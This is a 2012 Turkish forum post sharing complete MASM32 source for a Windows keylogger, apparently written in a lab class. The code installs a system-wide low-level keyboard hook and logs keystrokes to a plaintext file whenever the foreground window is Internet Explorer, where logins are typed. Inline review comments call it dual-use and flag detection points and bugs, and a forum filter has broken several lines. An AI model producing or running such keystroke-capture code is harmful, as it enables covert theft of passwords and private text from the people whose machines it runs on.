10-05-2012 19:41
#1
WOLSİN - ait Kullanıcı Resmi (Avatar)
Üye
İşte MASM32 ortamında yazılmış bir local keylogger örneği; bizzat microlab dersinde yazdık. El emeği, göz nuru. Not: forumun ifade (smiley) filtresi listedeki `:D` ve `:p` dizilerini silmiş görünüyor; derlemeden önce `keybproc PROTO :DWORD, :DWORD, :DWORD`, `keybproc proc code:DWORD, ...` ve `assume ebx:ptr ...` satırlarını buna göre düzeltin.

; Target: 32-bit Windows, MASM32, flat model, stdcall.
; Single-file local keylogger: installs a WH_KEYBOARD_LL hook and appends
; keystrokes to "key.log" (see main / keybproc below).
; NOTE(review): dual-use code.  Nothing in this listing hides the process,
; persists, or exfiltrates; the log is plaintext in the current directory.
; For detection purposes the interesting calls are
; SetWindowsHookEx(WH_KEYBOARD_LL) in main and the CreateFile on key.log.
.386
.model flat, stdcall
option casemap :none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib

; Local layout for the structure a WH_KEYBOARD_LL hook receives through
; lParam.  Field order and size must match the SDK's KBDLLHOOKSTRUCT;
; keybproc reads vkCode, scanCode and dwFlags through this layout.
KBDLLHOOKSTRUCT STRUCT

vkCode DWORD ?          ; virtual-key code
scanCode DWORD ?        ; hardware scan code
dwFlags DWORD ?         ; LLKHF_* flags; keybproc shifts these to bit 24 for GetKeyNameText
time DWORD ?            ; event timestamp (not used in this file)
dwExtraInfo DWORD ?     ; not used in this file

KBDLLHOOKSTRUCT ENDS

; Hook procedure prototype: (nCode, wParam, lParam), stdcall.
; NOTE(review): the forum's emoticon filter appears to have stripped ":D"
; three times from this line; MASM expects `PROTO :DWORD, :DWORD, :DWORD`.
keybproc PROTO DWORD, DWORD, DWORD

.data

file HANDLE 0              ; handle to key.log, set by main
buffer_offset DWORD 0      ; number of bytes currently pending in `buffer`
caps_lock_on BOOL 0        ; 1 while Caps Lock is held, so key auto-repeat does not re-toggle `caps`
shift BOOL 0               ; 1 while either Shift key is held
caps BOOL 0                ; Caps Lock toggle state as tracked by the hook

.const

class_name db "kLogger", 0
log_file db "key.log", 0   ; relative path: the log lands in the process's current directory
logger_started db "Logger started ", 0        ; 15 bytes; main writes it with a hard-coded length
logger_stopped db 13, 10, "Logger stopped ", 0 ; 17 bytes; likewise
format_time db "%02d.%02d.%d %02d:%02d (UTC)" ,13,10,0   ; day.month.year hour:minute, filled from GetSystemTime (UTC) in time2log
error db "Error",0
ie_title db "Internet Explorer",0 ; ie_active only reports a match when the foreground title ENDS with this



.data?
buffer db 32 dup(?)        ; staging buffer for keystrokes; drained by flush_buffer
hinst HINSTANCE ?
written DWORD ?            ; lpNumberOfBytesWritten for every WriteFile (never checked)
ghwnd HWND ?               ; hidden window that receives the WM_CLOSE posted on F10




.code
; Process entry: record the module handle, run main, and exit with whatever
; main leaves in eax (msg.wParam on a normal quit, or MessageBox's return
; value on main's early-error paths).
start:
invoke GetModuleHandle,NULL
mov hinst,eax
call main
invoke ExitProcess,eax


;-----------------------------------------------------------------------
; main: open (or append to) key.log, register a hidden window so the thread
; has a message loop, install the WH_KEYBOARD_LL hook, pump messages until
; WM_QUIT, then unhook, flush the buffer and close the log.
; Returns eax = msg.wParam (the PostQuitMessage exit code) on a normal quit,
; or MessageBox's return value on the three early-error paths.
;-----------------------------------------------------------------------
main proc
LOCAL wc:WNDCLASSEX
LOCAL hook:HHOOK
LOCAL msg:MSG

; OPEN_ALWAYS: create key.log if missing, otherwise open the existing file.
; The plaintext log is written to the current directory.
invoke CreateFile, addr log_file,GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL
mov file,eax
.IF(eax== INVALID_HANDLE_VALUE)
invoke MessageBox, NULL, addr error, addr error, MB_OK
ret
.ENDIF
; With OPEN_ALWAYS a successful CreateFile sets ERROR_ALREADY_EXISTS when
; the file pre-existed; in that case seek to the end so new data is appended.
invoke GetLastError
.IF (eax==ERROR_ALREADY_EXISTS)
invoke SetFilePointer,file,0,NULL,FILE_END
.ENDIF

; 15 = strlen(logger_started); keep in sync with the .const string.
invoke WriteFile,file,addr logger_started,15, addr written,NULL
call time2log

mov wc.cbSize, sizeof WNDCLASSEX
mov wc.style, CS_HREDRAW or CS_VREDRAW
mov wc.lpfnWndProc,offset main_wnd
mov wc.cbClsExtra, NULL
; NOTE(review): cbWndExtra is a byte count of extra per-window memory;
; WS_EX_CONTROLPARENT is an extended-style flag and has no meaning here.
mov wc.cbWndExtra, WS_EX_CONTROLPARENT
push hinst
pop wc.hInstance
mov wc.hbrBackground, COLOR_BTNFACE+1
mov wc.lpszMenuName, NULL
mov wc.lpszClassName,offset class_name
mov wc.hIcon,NULL
mov wc.hIconSm,NULL
mov wc.hCursor,NULL
invoke RegisterClassEx,addr wc


.IF(!eax)

invoke MessageBox, NULL, addr error,addr error,MB_OK
ret
.ENDIF


; Zero-size window with style 0 (no WS_VISIBLE): it is never shown and
; exists only so main_wnd can receive the WM_CLOSE posted by keybproc on F10.
invoke CreateWindowEx, NULL, addr class_name, NULL, 0, 0, 0, 0, 0, NULL, NULL, hinst, NULL

.IF(!eax)

invoke MessageBox, NULL, addr error,addr error,MB_OK
ret
.ENDIF



mov ghwnd, eax
; Seed the tracked Caps Lock state from the current keyboard state.
; NOTE(review): this tests the whole return value rather than only the
; toggle bit (bit 0), so a Caps Lock key physically held down at startup
; also reads as "on".
invoke GetKeyState, VK_CAPITAL

.IF(eax)

mov caps, 1
.ENDIF


; dwThreadId = 0 => system-wide low-level keyboard hook.  The installing
; thread must pump messages, which the loop below provides.  This is the
; call a defender would look for.
; NOTE(review): the returned HHOOK is never checked for NULL; on failure
; UnhookWindowsHookEx is later called with 0.
invoke SetWindowsHookEx, WH_KEYBOARD_LL, addr keybproc, hinst, NULL
mov hook, eax


; NOTE(review): GetMessage returns -1 on error, which `.IF(!eax)` treats as
; "keep looping"; only the WM_QUIT 0 return ends the loop.
.WHILE TRUE
invoke GetMessage, addr msg, NULL, 0,0
.BREAK .IF(!eax)
invoke TranslateMessage, addr msg
invoke DispatchMessage, addr msg

.ENDW



invoke UnhookWindowsHookEx, hook
call flush_buffer
; 17 = strlen(logger_stopped) including its leading CR LF.
invoke WriteFile, file, addr logger_stopped, 17, addr written, NULL
call time2log

invoke CloseHandle, file


mov eax,msg.wParam
ret


main endp




; Window procedure for the hidden "kLogger" window.
; WM_CLOSE (posted by keybproc on F10) ends main's message loop via
; PostQuitMessage(0) and returns 0; every other message is handed to
; DefWindowProc and its return value is passed straight back.
main_wnd proc hwnd:HWND, msg:UINT, wparam:WPARAM, lparam:LPARAM

.IF(msg==WM_CLOSE)
invoke PostQuitMessage, NULL
.ELSE

invoke DefWindowProc, hwnd, msg, wparam, lparam
ret
.ENDIF


xor eax,eax
ret
main_wnd endp



;-----------------------------------------------------------------------
; ie_active: eax = 1 if the foreground window's title, taken from some
; offset j to its end, equals ie_title case-insensitively -- i.e. the title
; ENDS with "Internet Explorer"; eax = 0 otherwise, including when
; GetWindowText returns 0 characters.
; lstrcmpi compares whole strings, so this is a suffix match rather than
; the substring search the loop shape suggests: a title such as
; "Internet Explorer - Foo" would NOT match.
; NOTE(review): ebx is callee-saved under the Win32 x86 ABI but is used as
; a scratch index here without being preserved.
;-----------------------------------------------------------------------
ie_active proc

local hwnd: HWND
local text[256]: BYTE     ; title buffer; GetWindowText truncates to fit
local i: UINT             ; suffixes left to try
local j: UINT             ; start offset of the current suffix


call GetForegroundWindow
mov hwnd, eax

invoke GetWindowText, hwnd, addr text, SIZEOF text
mov i, eax
mov j,0

; Try every suffix text[j..] against ie_title.
.WHILE(i)

mov ebx, j
invoke lstrcmpi, addr text[ebx], addr ie_title
.IF(!eax)

mov eax, 1
ret
.ENDIF
dec i
inc j
.ENDW


xor eax, eax
ret

ie_active endp









;-----------------------------------------------------------------------
; keybproc: WH_KEYBOARD_LL hook procedure (nCode, wParam, lParam).
; Acts only when nCode == HC_ACTION and ie_active reports a matching
; foreground window; in every other case, and normally after acting, the
; event is forwarded with CallNextHookEx and that return value is returned.
; On WM_KEYDOWN it tracks Shift / Caps Lock, appends digits and letters to
; `buffer`, writes any other key as "[name]" ("[!name]" while Shift is
; held) via GetKeyNameText, and on F10 posts WM_CLOSE to the hidden window.
; Only WM_KEYDOWN / WM_KEYUP are examined; WM_SYSKEYDOWN / WM_SYSKEYUP
; (Alt-modified keys) are ignored.
; Register roles inside the HC_ACTION branch:
;   ebx = lParam as KBDLLHOOKSTRUCT*, edx = vkCode, ecx = buffer index.
; NOTE(review): ebx is callee-saved under the Win32 x86 ABI and is clobbered
; here (and inside ie_active) without being saved/restored.
; NOTE(review): low-level hook procedures must return quickly; the
; per-event GetForegroundWindow/GetWindowText in ie_active and the
; synchronous WriteFile in flush_buffer all run inside the hook's time
; budget.
; NOTE(review): the forum's emoticon filter appears to have stripped ":D"
; from the PROC line (`code:DWORD`) and ":p" from the assume line below
; (`assume ebx:ptr KBDLLHOOKSTRUCT`).
;-----------------------------------------------------------------------
keybproc proc code DWORD, wparam:WPARAM, lparam: LPARAM

call ie_active
.IF (eax && (code == HC_ACTION))
mov ebx, lparam
assume ebxtr KBDLLHOOKSTRUCT
mov edx, [ebx].vkCode
.IF (wparam ==WM_KEYDOWN)
; F10 is the kill switch: ask the hidden window to close, which ends main's
; message loop.  Returning here without CallNextHookEx, with PostMessage's
; nonzero result still in eax, also swallows the F10 keystroke.
.IF (edx == VK_F10)
invoke PostMessage, ghwnd, WM_CLOSE, NULL, NULL
ret
.ENDIF

; Modifier tracking: `shift` is held-state; `caps` toggles once per
; physical press (caps_lock_on blocks auto-repeat until a key-up clears it).

.IF (edx == VK_LSHIFT || edx ==VK_RSHIFT)
mov shift, 1
.ELSEIF (edx == VK_CAPITAL)
.IF (!caps_lock_on)
; toggle caps true/ false
xor caps, 1
mov caps_lock_on, 1
.ENDIF
.ELSE
; Flush once 16 or more bytes are pending so the worst case below --
; "[!" + a key name capped at (31 - index) chars + "]" -- still fits in 32.
.IF (buffer_offset >=32-16)
call flush_buffer
.ENDIF

mov ecx, buffer_offset

.IF (edx == VK_SPACE|| edx == VK_RETURN || edx == VK_TAB)
; VK_SPACE/VK_RETURN/VK_TAB equal their ASCII codes, so dl is stored as-is.
mov buffer[ecx], dl
inc ecx
.ELSEIF (!shift && (edx>2Fh && edx < 3Ah))
; 0..9 (VK_0..VK_9 == '0'..'9').  Shifted digits are not translated; they
; fall through to the "[!name]" branch.
mov buffer[ecx], dl
inc ecx
.ELSEIF (edx > 40h && edx < 5Bh)
; A..Z: VK codes are the uppercase ASCII letters.  Lowercase unless exactly
; one of Shift / Caps Lock is active (shift XOR caps).
mov eax, shift
xor eax , caps
.IF (!eax)
or edx, 20h
.ENDIF

mov buffer[ecx], dl
inc ecx
.ELSE
; Any other key: "[" ["!" if shifted] <GetKeyNameText result> "]".

mov buffer[ecx], '['
inc ecx
.IF (shift)
mov buffer[ecx], '!'
inc ecx
.ENDIF

; Manual stdcall call, arguments pushed right to left:
; cchSize = 31 - index, lpString = &buffer[index], lParam.  ecx is
; caller-saved, so the buffer index is saved around the call.
push ecx
mov eax , 32-1
sub eax, ecx
push eax
lea eax, buffer[ecx]
push eax
; Rebuild a WM_KEYDOWN-style lParam: scan code in bits 16-23, dwFlags
; shifted to bit 24 so LLKHF_EXTENDED lands on the extended-key bit that
; GetKeyNameText examines.
mov edx, [ebx].scanCode
mov eax, [ebx].dwFlags
shl edx , 16
shl eax , 24
or edx, eax
push edx
call GetKeyNameText
pop ecx
; eax = characters copied (0 on failure); advance past the name.
add ecx, eax
mov buffer[ecx], ']'
inc ecx
.ENDIF
mov buffer_offset, ecx
.ENDIF
.ELSEIF (wparam== WM_KEYUP)
.IF (edx == VK_LSHIFT || edx == VK_RSHIFT)
mov shift, 0
.ELSE
; Any non-Shift key-up re-arms Caps Lock toggling.
mov caps_lock_on, 0
.ENDIF
.ENDIF

assume ebx: nothing
.ENDIF

invoke CallNextHookEx , NULL, code, wparam, lparam

ret
keybproc endp
;-----------------------------------------------------------------------
; time2log: append the current date/time as "dd.mm.yyyy HH:MM (UTC)\r\n"
; to the log.  GetSystemTime yields UTC, which matches the "(UTC)" suffix
; in format_time.  On return eax holds WriteFile's BOOL result (callers
; ignore it).
; NOTE(review): ebx (callee-saved) is used as the SYSTEMTIME base and is
; not preserved.
; NOTE(review): wsprintf is cdecl, so the 8 pushed dwords are the caller's
; to pop and nothing here does; this appears to work only because MASM's
; generated epilogue for a PROC with LOCALs restores esp from ebp -- verify.
; NOTE(review): the forum's emoticon filter appears to have stripped ":p"
; from the assume line (`assume ebx:ptr SYSTEMTIME`).
;-----------------------------------------------------------------------
time2log proc
LOCAL SysTime:SYSTEMTIME
LOCAL output[32]:BYTE    ; longest output for year <= 65535 is 25 chars + NUL

;Get current date/time
invoke GetSystemTime,addr SysTime
lea ebx,SysTime
assume ebxtr SYSTEMTIME
; Push wsprintf arguments right to left.  eax is zeroed once and each WORD
; is loaded into ax, so every push is a zero-extended dword.  wSecond is
; pushed but the format string consumes only Day, Month, Year, Hour, Minute.
xor eax,eax
mov ax,[ebx].wSecond
push eax
mov ax,[ebx].wMinute
push eax
mov ax,[ebx].wHour
push eax
mov ax,[ebx].wYear
push eax
mov ax,[ebx].wMonth
push eax
mov ax,[ebx].wDay
push eax
assume ebx:nothing
push offset format_time
lea eax,output
push eax
call wsprintf
; eax = characters written (excluding NUL) = exact byte count to log.

;Write it to the log file
invoke WriteFile, file,addr output, eax, addr written, NULL
ret

time2log endp

; flush_buffer: write the buffer_offset pending bytes of `buffer` to the
; log and reset buffer_offset to 0; a no-op when nothing is pending.
; Called from keybproc (inside the hook callback) and from main at
; shutdown.  WriteFile's result is not checked; the stdcall invoke
; clobbers eax, ecx and edx.
flush_buffer proc
;Write buffered data to log file
.IF (buffer_offset!=0)
invoke WriteFile,file,addr buffer, buffer_offset,addr written,NULL

mov buffer_offset,0
.ENDIF
ret
flush_buffer endp
end start
Konu WOLSİN tarafından (10-05-2012 19:48 Saat 19:48 ) değiştirilmiştir.

